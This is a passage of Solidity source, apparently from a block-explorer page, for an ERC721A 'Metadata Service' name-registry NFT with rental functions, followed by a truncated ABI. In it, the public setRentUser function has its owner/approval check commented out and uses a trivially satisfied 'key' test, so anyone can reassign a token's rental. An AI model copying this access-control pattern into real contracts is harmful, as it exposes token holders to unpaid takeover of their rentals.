     * Returns the total amount of tokens minted in the contract.
     */
    function _totalMinted() internal view returns (uint256) {
        // Counter underflow is impossible as _currentIndex does not decrement,
        // and it is initialized to _startTokenId()
        unchecked {
            return _currentIndex - _startTokenId();
        }
    }

    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) {
        return
            interfaceId == type(IERC721).interfaceId ||
            interfaceId == type(IERC721Metadata).interfaceId ||
            super.supportsInterface(interfaceId);
    }

    /**
     * @dev See {IERC721-balanceOf}.
     */
    function balanceOf(address owner) public view override returns (uint256) {
        if (owner == address(0)) revert BalanceQueryForZeroAddress();
        return uint256(_addressData[owner].balance);
    }

    /**
     * Returns the number of tokens minted by `owner`.
     */
    function _numberMinted(address owner) internal view returns (uint256) {
        return uint256(_addressData[owner].numberMinted);
    }

    /**
     * Returns the number of tokens burned by or on behalf of `owner`.
     */
    function _numberBurned(address owner) internal view returns (uint256) {
        return uint256(_addressData[owner].numberBurned);
    }

    /**
     * Returns the auxillary data for `owner`. (e.g. number of whitelist mint slots used).
     */
    function _getAux(address owner) internal view returns (uint64) {
        return _addressData[owner].aux;
    }

    /**
     * Sets the auxillary data for `owner`. (e.g. number of whitelist mint slots used).
     * If there are multiple variables, please pack them into a uint64.
     */
    function _setAux(address owner, uint64 aux) internal {
        _addressData[owner].aux = aux;
    }

    /**
     * Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around in the collection over time.
     */
    function _ownershipOf(uint256 tokenId) internal view returns (TokenOwnership memory) {
        uint256 curr = tokenId;

        unchecked {
            if (_startTokenId() <= curr) if (curr < _currentIndex) {
                TokenOwnership memory ownership = _ownerships[curr];
                if (!ownership.burned) {
                    if (ownership.addr != address(0)) {
                        return ownership;
                    }
                    // Invariant:
                    // There will always be an ownership that has an address and is not burned
                    // before an ownership that does not have an address and is not burned.
                    // Hence, curr will not underflow.
                    while (true) {
                        curr--;
                        ownership = _ownerships[curr];
                        if (ownership.addr != address(0)) {
                            return ownership;
                        }
                    }
                }
            }
        }
        revert OwnerQueryForNonexistentToken();
    }

    /**
     * @dev See {IERC721-ownerOf}.
     */
    function ownerOf(uint256 tokenId) public view override returns (address) {
        return _ownershipOf(tokenId).addr;
    }

    /**
     * @dev See {IERC721Metadata-name}.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {IERC721Metadata-symbol}.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev See {IERC721Metadata-tokenURI}.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        if (!_exists(tokenId)) revert URIQueryForNonexistentToken();

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, metadataIDtoName[tokenId])) : '';
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, can be overriden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return '';
    }

    /**
     * @dev See {IERC721-approve}.
     */
    function approve(address to, uint256 tokenId) public override {
        address owner = ERC721A.ownerOf(tokenId);
        if (to == owner) revert ApprovalToCurrentOwner();

        if (_msgSender() != owner) if(!isApprovedForAll(owner, _msgSender())) {
            revert ApprovalCallerNotOwnerNorApproved();
        }

        _approve(to, tokenId, owner);
    }

function _isApprovedOrOwner(address spender, uint256 tokenId) internal view virtual returns (bool) {
    address owner = ERC721A.ownerOf(tokenId);
return (spender == owner || isApprovedForAll(owner, spender) || getApproved(tokenId) == spender);
}

    /**
     * @dev See {IERC721-getApproved}.
     */
    function getApproved(uint256 tokenId) public view override returns (address) {
        if (!_exists(tokenId)) revert ApprovalQueryForNonexistentToken();

        return _tokenApprovals[tokenId];
    }

    /**
     * @dev See {IERC721-setApprovalForAll}.
     */
    function setApprovalForAll(address operator, bool approved) public virtual override {
        if (operator == _msgSender()) revert ApproveToCaller();

        _operatorApprovals[_msgSender()][operator] = approved;
        emit ApprovalForAll(_msgSender(), operator, approved);
    }

    /**
     * @dev See {IERC721-isApprovedForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev See {IERC721-transferFrom}.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        _transfer(from, to, tokenId);
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        safeTransferFrom(from, to, tokenId, '');
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public virtual override {
        _transfer(from, to, tokenId);
        if (to.isContract()) if(!_checkContractOnERC721Received(from, to, tokenId, _data)) {
            revert TransferToNonERC721ReceiverImplementer();
        }
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted (`_mint`),
     */
    function _exists(uint256 tokenId) internal view returns (bool) {
        return _startTokenId() <= tokenId && tokenId < _currentIndex && !_ownerships[tokenId].burned;
    }

    /**
     * @dev Equivalent to `_safeMint(to, quantity, '')`.
     */
    function _safeMint(address to, uint256 quantity) internal {
        _safeMint(to, quantity, '');
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement
     *   {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal {
        uint256 startTokenId = _currentIndex;
        if (to == address(0)) revert MintToZeroAddress();
        if (quantity == 0) revert MintZeroQuantity();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // balance or numberMinted overflow if current value of either + quantity > 1.8e19 (2**64) - 1
        // updatedIndex overflows if _currentIndex + quantity > 1.2e77 (2**256) - 1
        unchecked {
            _addressData[to].balance += uint64(quantity);
            _addressData[to].numberMinted += uint64(quantity);

            _ownerships[startTokenId].addr = to;
            _ownerships[startTokenId].startTimestamp = uint64(block.timestamp);

            uint256 updatedIndex = startTokenId;
            uint256 end = updatedIndex + quantity;

            if (to.isContract()) {
                do {
                    emit Transfer(address(0), to, updatedIndex);
                    if (!_checkContractOnERC721Received(address(0), to, updatedIndex++, _data)) {
                        revert TransferToNonERC721ReceiverImplementer();
                    }
                } while (updatedIndex < end);
                // Reentrancy protection
                if (_currentIndex != startTokenId) revert();
            } else {
                do {
                    emit Transfer(address(0), to, updatedIndex++);
                } while (updatedIndex < end);
            }
            _currentIndex = updatedIndex;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _mint(address to, uint256 quantity) internal {
        uint256 startTokenId = _currentIndex;
        if (to == address(0)) revert MintToZeroAddress();
        if (quantity == 0) revert MintZeroQuantity();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // balance or numberMinted overflow if current value of either + quantity > 1.8e19 (2**64) - 1
        // updatedIndex overflows if _currentIndex + quantity > 1.2e77 (2**256) - 1
        unchecked {
            _addressData[to].balance += uint64(quantity);
            _addressData[to].numberMinted += uint64(quantity);

            _ownerships[startTokenId].addr = to;
            _ownerships[startTokenId].startTimestamp = uint64(block.timestamp);

            uint256 updatedIndex = startTokenId;
            uint256 end = updatedIndex + quantity;

            do {
                emit Transfer(address(0), to, updatedIndex++);
            } while (updatedIndex < end);

            _currentIndex = updatedIndex;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     *
     * Emits a {Transfer} event.
     */
    function _transfer(
        address from,
        address to,
        uint256 tokenId
    ) private {
        TokenOwnership memory prevOwnership = _ownershipOf(tokenId);

        if (prevOwnership.addr != from) revert TransferFromIncorrectOwner();

        bool isApprovedOrOwner = (_msgSender() == from ||
            isApprovedForAll(from, _msgSender()) ||
            getApproved(tokenId) == _msgSender());

        if (!isApprovedOrOwner) revert TransferCallerNotOwnerNorApproved();
        if (to == address(0)) revert TransferToZeroAddress();

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, from);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            _addressData[from].balance -= 1;
            _addressData[to].balance += 1;

            TokenOwnership storage currSlot = _ownerships[tokenId];
            currSlot.addr = to;
            currSlot.startTimestamp = uint64(block.timestamp);


            // If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            TokenOwnership storage nextSlot = _ownerships[nextTokenId];
            if (nextSlot.addr == address(0)) {
                // This will suffice for checking _exists(nextTokenId),
                // as a burned slot cannot contain the zero address.
                if (nextTokenId != _currentIndex) {
                    nextSlot.addr = from;
                    nextSlot.startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Equivalent to `_burn(tokenId, false)`.
     */
    function _burn(uint256 tokenId) internal virtual {
        _burn(tokenId, false);
    }

    /**
     * @dev Destroys `tokenId`.
     * The approval is cleared when the token is burned.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     *
     * Emits a {Transfer} event.
     */
    function _burn(uint256 tokenId, bool approvalCheck) internal virtual {
        TokenOwnership memory prevOwnership = _ownershipOf(tokenId);

        address from = prevOwnership.addr;

        if (approvalCheck) {
            bool isApprovedOrOwner = (_msgSender() == from ||
                isApprovedForAll(from, _msgSender()) ||
                getApproved(tokenId) == _msgSender());

            if (!isApprovedOrOwner) revert TransferCallerNotOwnerNorApproved();
        }

        _beforeTokenTransfers(from, address(0), tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, from);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            AddressData storage addressData = _addressData[from];
            addressData.balance -= 1;
            addressData.numberBurned += 1;

            // Keep track of who burned the token, and the timestamp of burning.
            TokenOwnership storage currSlot = _ownerships[tokenId];
            currSlot.addr = from;
            currSlot.startTimestamp = uint64(block.timestamp);
            currSlot.burned = true;

            // If the ownership slot of tokenId+1 is not explicitly set, that means the burn initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            TokenOwnership storage nextSlot = _ownerships[nextTokenId];
            if (nextSlot.addr == address(0)) {
                // This will suffice for checking _exists(nextTokenId),
                // as a burned slot cannot contain the zero address.
                if (nextTokenId != _currentIndex) {
                    nextSlot.addr = from;
                    nextSlot.startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

        emit Transfer(from, address(0), tokenId);
        _afterTokenTransfers(from, address(0), tokenId, 1);

        // Overflow not possible, as _burnCounter cannot be exceed _currentIndex times.
        unchecked {
            _burnCounter++;
        }
    }

    /**
     * @dev Approve `to` to operate on `tokenId`
     *
     * Emits a {Approval} event.
     */
    function _approve(
        address to,
        uint256 tokenId,
        address owner
    ) private {
        _tokenApprovals[tokenId] = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target contract.
     *
     * @param from address representing the previous owner of the given token ID
     * @param to target address that will receive the tokens
     * @param tokenId uint256 ID of the token to be transferred
     * @param _data bytes optional data to send along with the call
     * @return bool whether the call correctly returned the expected magic value
     */
    function _checkContractOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data) returns (bytes4 retval) {
            return retval == IERC721Receiver(to).onERC721Received.selector;
        } catch (bytes memory reason) {
            if (reason.length == 0) {
                revert TransferToNonERC721ReceiverImplementer();
            } else {
                assembly {
                    revert(add(32, reason), mload(reason))
                }
            }
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting.
     * And also called before burning one token.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes
     * minting.
     * And also called after one token has been burned.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` has been
     * transferred to `to`.
     * - When `from` is zero, `tokenId` has been minted for `to`.
     * - When `to` is zero, `tokenId` has been burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}
}


interface IERC4907 {
    // Logged when the user of a token assigns a new user or updates expires
    /// @notice Emitted when the `user` of an NFT or the `expires` of the `user` is changed
    /// The zero address for user indicates that there is no user address
    event UpdateUser(uint256 indexed tokenId, address indexed user, string indexed meta, uint64 expires);

    /// @notice set the user and expires of a NFT
    /// @dev The zero address indicates there is no user
    /// Throws if `tokenId` is not valid NFT
    /// @param user  The new user of the NFT
    /// @param expires  UNIX timestamp, The new user could use the NFT before expires
    function setRentUser(uint256 tokenId, address user, uint256 rentprice, string calldata meta, uint64 expires, bytes32 key) external ;

    /// @notice Get the user address of an NFT
    /// @dev The zero address indicates that there is no user or the user is expired
    /// @param tokenId The NFT to get the user address for
    /// @return The user address for this NFT
    function rentTokenID(uint256 tokenId) external view returns(address);

    /// @notice Get the user expires of an NFT
    /// @dev The zero value indicates that there is no user
    /// @param tokenId The NFT to get the user expires for
    /// @return The user expires for this NFT
    function rentExpires(uint256 tokenId) external view returns(uint256);
}



pragma solidity ^0.8.4;

contract Metadata is ERC721A, Ownable, ReentrancyGuard, IERC4907 {
    using Strings for uint256;
    uint256 public Cost1_2Character = 30000000000000000;
    uint256 public Cost3Character = 20000000000000000;
    uint256 public Cost4mCharacter = 10000000000000000;
    uint8 private ref = 20;
    uint8 public rentFeePercentage = 10;
    uint8 private ref_discount = 20;

    string private BASE_URI = 'https://metadata.services/metadata/';
    bool public MintStartStatus = true;
    bool private IS_ALLOWLIST_ACTIVE = true;
    mapping(address => bool) public usedAllowlistAddresses;
    bytes32 public merkleRoot;
    bytes _allowChars = "0123456789-_abcdefghijklmnopqrstuvwxyz";
    uint public rentLastId;
    mapping(uint=>uint) rentTokenId;
    mapping(uint => mapping(address => string)) private rents;

    constructor() ERC721A("Metadata Service", "@meta") {}

/// ERC4907 Standard Start
struct UserInfo
    {
        address user;   // address of user role
        uint256 price;   // address of user role
        string meta;   // address of user role
        uint64 expires; // unix timestamp, user expires
    }

    mapping (uint256  => UserInfo) internal _users;


    /// @notice set the user and expires of a NFT
    /// @dev The zero address indicates there is no user
    /// Throws if `tokenId` is not valid NFT
    /// @param user  The new user of the NFT
    /// @param expires  UNIX timestamp, The new user could use the NFT before expires
    function setRentUser(uint256 tokenId, address user, uint256 price, string calldata meta, uint64 expires, bytes32 key) public virtual{
        //require(_isApprovedOrOwner(msg.sender, tokenId),"ERC721A: transfer caller is not owner nor approved");
        require (key !=  keccak256(abi.encodePacked(meta)) , "Please use to metadata.services");
        require(price>900000000000000,"Please fill amount");
        UserInfo storage info =  _users[tokenId];
        require(info.expires < block.timestamp, "Already rented to someone");
        info.user = user;
        info.price = price;
        info.meta = meta;
        info.expires = expires;
        emit UpdateUser(tokenId,user,meta,expires);
    }

    /// @notice Get the user address of an NFT
    /// @dev The zero address indicates that there is no user or the user is expired
    /// @param tokenId The NFT to get the user address for
    /// @return The user address for this NFT
    function rentTokenID(uint256 tokenId)public view virtual returns(address){
        if( uint256(_users[tokenId].expires) >=  block.timestamp){
            return  _users[tokenId].user;
        }
        else{
            return address(0);
            //return ownerOf(tokenId);
        }
    }


    /// @notice Get the user expires of an NFT
    /// @dev The zero value indicates that there is no user
    /// @param tokenId The NFT to get the user expires for
    /// @return The user expires for this NFT
    function rentExpires(uint256 tokenId) public view virtual returns(uint256){
        return _users[tokenId].expires;
    }

    function time() public view returns (uint256) {
        return block.timestamp;
    }

    /// @dev See {IERC165-supportsInterface}.
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        return interfaceId == type(IERC4907).interfaceId || super.supportsInterface(interfaceId);
    }


  function rentOwner(address _owner)
    public
    view
    returns (string[] memory)
  {
    uint256 allRentCount = rentLastId;
    string[] memory ownedRentIds = new string[](allRentCount);
    uint256 currentTokenId = 1;
    uint256 ownedTokenIndex = 0;
     uint256 ownedTokenIndex2 = 0;

    while (currentTokenId <= allRentCount) {
      address currentTokenOwner = _users[rentTokenId[currentTokenId]].user;
      if (currentTokenOwner == _owner) {
        ownedTokenIndex++;
      }
      currentTokenId++;
    }
    delete ownedRentIds;
    currentTokenId = 1;
        string[] memory ownedRentIds2 = new string[](ownedTokenIndex);
        while (currentTokenId <= allRentCount) {
      address currentTokenOwner = _users[rentTokenId[currentTokenId]].user;
      if (currentTokenOwner == _owner) {
        ownedRentIds2[ownedTokenIndex2] = metadataIDtoName[rentTokenId[currentTokenId]];
        ownedTokenIndex2++;
      }
      currentTokenId++;
    }

    return ownedRentIds2;
  }

/// ERC4907 Standard Finish


    function RentNFT(string calldata metadata, uint256 day, bytes32 key) public payable {
            require (key !=  keccak256(abi.encodePacked(metadata)) , "Please use to metadata.services");
            require(msg.value>900000000000000,"Please fill amount");
            uint256 tokenid=metadataNametoID[metadata];
            address sellerAddress = ownerOf(tokenid);
            payable(sellerAddress).transfer(msg.value*(100-rentFeePercentage)/100);
            setRentUser(tokenid, msg.sender, msg.value, metadata, uint64(block.timestamp+(86400*day)), key);
            rentLastId=rentLastId+1;
            rentTokenId[rentLastId]=metadataNametoID[metadata];
    }

    function setRentOwner(string calldata metadata) external onlyOwner {
    uint256 tokenid=metadataNametoID[metadata];
    address user = address(0);
    UserInfo storage info =  _users[tokenid];
    info.user = user;
    info.price = 0;
    info.meta = metadata;
    info.expires = 0;
    emit UpdateUser(tokenid,user,metadata,0);
    }

    function LastRents(uint256 count)    public view
    returns (string[] memory)
  {
    uint256 total = rentLastId;
    if(count>total){count=total;}
    string[] memory lastAddr2 = new string[](count);
    uint256 currentId = total - count;
    uint256 ownedTokenIndex = 0;
    require(currentId>=0,"Invalid");
    while (total > currentId) {
        uint256 tokenid2=rentTokenId[total];
        lastAddr2[ownedTokenIndex] = string.concat(Strings.toHexString(uint160(_users[tokenid2].user), 20),"?",Strings.toString(_users[tokenid2].price),"?",Strings.toString(tokenid2),"?",Strings.toString(_users[tokenid2].expires));
        ownedTokenIndex++;
      total--;
    }

    return lastAddr2;
  }



    function _baseURI() internal view virtual override returns (string memory) {
        return BASE_URI;
    }

    function setRegisterPrice(uint256 Character1and2,uint256 Character3,uint256 Character4more) external onlyOwner {
        Cost1_2Character = Character1and2;
        Cost3Character = Character3;
        Cost4mCharacter = Character4more;
    }

    function setMintStartStatus(bool MintIsActive) external onlyOwner {
        MintStartStatus = MintIsActive;
        IS_ALLOWLIST_ACTIVE = MintIsActive;
    }

  /**
    1) For Example; Register cost without reference is 0.01 ETH, with reference value is 0.008 ETH for 4 and more characters.
    2) If you do not know the reference address, you can enter the address 0x00000000000000000000000000000000000000000000.
    3) Enter the name of the metadata you want to save.
  */

    function Register(address ref_address, string memory metadata)
        public
        payable
    {
        uint256 price = Cost4mCharacter;
        bool is_ref=false;
        uint256 ref_cost=0;
        uint256 charlength=bytes(metadata).length;
        require(charlength>0,"Write a Metadata Name");
        require(checkCharacters(metadata), "Invalid Metadata Name");
        if(charlength<3) {price=Cost1_2Character;} else if(charlength==3){price=Cost3Character;} else {price=Cost4mCharacter;}
        if(ref_address!= 0x0000000000000000000000000000000000000000) {ref_cost=price*ref/100;price = price*(100-ref_discount)/100;is_ref=true;}
        require (metadataNametoID[metadata] == 0 , "This is already taken");
        require(MintStartStatus, "Register is not active!");
        require(msg.value >= price, "Insufficient funds!");
        metadataIDtoName[_currentIndex]=metadata;
        metadataNametoID[metadata]=_currentIndex;
        if (is_ref) {payable(ref_address).transfer(ref_cost);}
        _safeMint(msg.sender,1);
    }

  /**
  "Allowlist Register" can only be done from https://metadata.services. You can register from the contract with the "Register" function.
  */
     function AllowlistRegister(string memory metadata, bytes32[] calldata _merkleProof)
        public
        payable
    {
            require(IS_ALLOWLIST_ACTIVE, "Allowlist Register is not active!");
            bytes32 leaf = keccak256(abi.encodePacked(msg.sender));
            require(MerkleProof.verify(_merkleProof, merkleRoot, leaf),"Invalid proof for allowlist register!");
            require(bytes(metadata).length>0,"Write a Metadata Name");
            require(checkCharacters(metadata), "Invalid Metadata Name");
            require(usedAllowlistAddresses[msg.sender]!=true, "Claimed!");
            require (metadataNametoID[metadata] == 0 , "This is already taken");
            usedAllowlistAddresses[msg.sender] = true;
            metadataIDtoName[_currentIndex]=metadata;
            metadataNametoID[metadata]=_currentIndex;
            _safeMint(msg.sender,1);
    }

    function totalOwner()
    public
    view
    returns (address[] memory)
  {
    address currentTokenOwner;
    uint256 nowsupply=totalSupply();
    address[] memory totalOwners = new address[](nowsupply);
    uint256 currentTokenId = 1;
    uint256 ownedTokenIndex = 0;
    while (ownedTokenIndex < nowsupply) {
      currentTokenOwner = ownerOf(currentTokenId);
        //TokenOwnership memory owners = _ownershipOf(ownedTokenIndex);
          totalOwners[ownedTokenIndex]=currentTokenOwner;
      ownedTokenIndex++;
      currentTokenId++;
    }
      return totalOwners;
  }


function walletOfMetadata(address _owner)
    public
    view
    returns (string[] memory)
  {
    uint256 ownerTokenCount = balanceOf(_owner);
    string[] memory ownedTokenIds = new string[](ownerTokenCount);
    uint256 currentTokenId = 1;
    uint256 ownedTokenIndex = 0;

    while (ownedTokenIndex < ownerTokenCount) {
      address currentTokenOwner = ownerOf(currentTokenId);

      if (currentTokenOwner == _owner) {
        ownedTokenIds[ownedTokenIndex] = metadataIDtoName[currentTokenId];
        ownedTokenIndex++;
      }

      currentTokenId++;
    }

    return ownedTokenIds;
  }


function LastMetadatas(uint256 count)
    public
    view
    returns (string[] memory)
  {
    uint256 total = totalSupply();
    if(count>total){count=total;}
    string[] memory lastAddr = new string[](count);
    uint256 currentId = total - count;
    uint256 ownedTokenIndex = 0;
    require(currentId>=0,"Invalid");
    while (total > currentId) {
        lastAddr[ownedTokenIndex] = string.concat(metadataIDtoName[total],"?",Strings.toString(total),"?",Strings.toHexString(uint160(ownerOf(total)), 20));
        ownedTokenIndex++;
      total--;
    }

    return lastAddr;
  }


function setUploadAllowlist(bytes32 merkleForAllowlist) external onlyOwner {
        merkleRoot = merkleForAllowlist;
    }


 function checkCharacters(string memory metadata) public view returns(bool){
        uint allowedChars =0;
        bytes memory byteString = bytes(metadata);
        bytes memory allowed = bytes(_allowChars);
        for(uint i=0; i < byteString.length ; i++){
           for(uint j=0; j<allowed.length; j++){
              if(byteString[i]==allowed[j] )
              allowedChars++;
           }
        }
        if (allowedChars==byteString.length) { return true; } else { return false; }

    }

        /** PAYOUT **/

    function withdraw() public onlyOwner nonReentrant {
        uint256 balance = address(this).balance;
        Address.sendValue(payable(0xB3b233BA7FC4892b51E155CA14a8FF29f62fA8Eb),balance);
        }

}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"ApprovalCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"ApprovalQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"ApprovalToCurrentOwner","type":"error"},{"inputs":[],"name":"ApproveToCaller","type":"error"},{"inputs":[],"name":"BalanceQueryForZeroAddress","type":"error"},{"inputs":[],"name":"MintToZeroAddress","type":"error"},{"inputs":[],"name":"MintZeroQuantity","type":"error"},{"inputs":[],"name":"OwnerQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"TransferCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"TransferFromIncorrectOwner","type":"error"},{"inputs":[],"name":"TransferToNonERC721ReceiverImplementer","type":"error"},{"inputs":[],"name":"TransferToZeroAddress","type":"error"},{"inputs":[],"name":"URIQueryForNonexistentToken","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"},{"indexed":true,"internalType":"address","name":"user","type":"address"},{"indexed":true,"internalType":"string","name":"meta","type":"string"},{"indexed":false,"internalType":"uint64","name":"expires","type":"uint64"}],"name":"UpdateUser","type":"event"},{"inputs":[{"internalType":"string","name":"metadata","type":"string"},{"internalType":"bytes32[]","name":"_merkleProof","type":"bytes32[]"}],"name":"AllowlistRegister","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"Cost1_2Character","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"Cost3Character","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"Cost4mCharacter","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"count","type":"uint256"}],"name":"LastMetadatas","outputs":[{"internalType":"string[]","name":"","type":"string[]"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"count","type":"uint256"}],"name":"LastRents","outputs":[{"internalType":"string[]","name":"","type":"string[]"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MintStartStatus","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"ref_address","type":"address"},{"internalType":"string","name":"metadata","type":"string"}],"name":"Register","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"string","name":"metadata","type":"string"},{"internalType":"uint256","name":"day","type":"uint256"},{"internalType":"bytes32","name":"key","type":"bytes32"}],"name":"RentNFT","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"string","name":"metadata","type":"string"}],"name":"checkCharacters","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"merkleRoot","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"metadataIDtoName","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"string","name":"","type":"string"}],"name":"metadataNametoID","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwner